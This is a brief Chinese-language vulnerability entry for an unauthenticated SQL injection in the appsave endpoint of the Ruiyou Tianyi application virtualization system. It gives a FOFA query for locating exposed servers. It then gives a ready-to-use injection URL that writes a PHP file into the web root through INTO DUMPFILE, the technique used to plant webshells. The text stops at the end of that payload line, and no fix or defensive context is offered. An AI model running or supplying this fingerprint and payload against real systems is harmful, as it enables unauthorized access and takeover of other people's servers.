0x01 产品简介
N/A
0x02 漏洞概述
瑞友天翼应用虚拟化系统 appsave接口存在SQL注入漏洞,未授权的攻击者可以通过该漏洞执行任意sql语句。
0x03 测绘语句
fofa: body="瑞友天翼 - 应用虚拟化系统"
0x04 漏洞复现
1、执行sql语句:http://xxxx/hmrao.php?s=/Admin/appsave&appid=11111111%27);select+%27%3C%3fphp+echo+md5(11111111)%3f%3E%27+into+dumpfile+%27../../WebRoot/11122222.php%27%3b--+</